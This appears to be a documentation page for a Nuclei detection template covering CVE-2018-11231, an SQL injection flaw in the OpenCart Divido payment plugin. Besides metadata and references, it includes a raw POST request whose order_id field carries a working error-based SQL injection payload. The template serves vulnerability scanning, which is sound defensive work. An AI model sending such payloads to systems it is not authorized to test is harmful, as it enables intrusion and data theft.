Opencart Divido - Sql Injection
ID: CVE-2018-11231
Severity: high
Author: ritikchaddha
Tags: cve,cve2018,opencart,sqli,intrusive,divido
Description
Section titled “Description”OpenCart Divido plugin is susceptible to SQL injection
YAML Source
Section titled “YAML Source”id: CVE-2018-11231
info: name: Opencart Divido - Sql Injection author: ritikchaddha severity: high description: | OpenCart Divido plugin is susceptible to SQL injection impact: | This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system. remediation: | Apply the official patch or upgrade to a version that includes the fix. reference: - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - http://foreversong.cn/archives/1183 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 epss-percentile: 0.82368 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 vendor: divido product: divido framework: opencart tags: cve,cve2018,opencart,sqli,intrusive,dividovariables: num: "999999999"
http: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body words: - "{{md5({{num}})}}"
- type: status status: - 200# digest: 4b0a00483046022100ff97d3023ea116803e4308ecb758749d850db4ed172359c1336ef19f1874733b022100e459ec15d05be2351881cfdfda7155ea8140ea31b89c8283e679ca4eb686412d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-11231.yaml"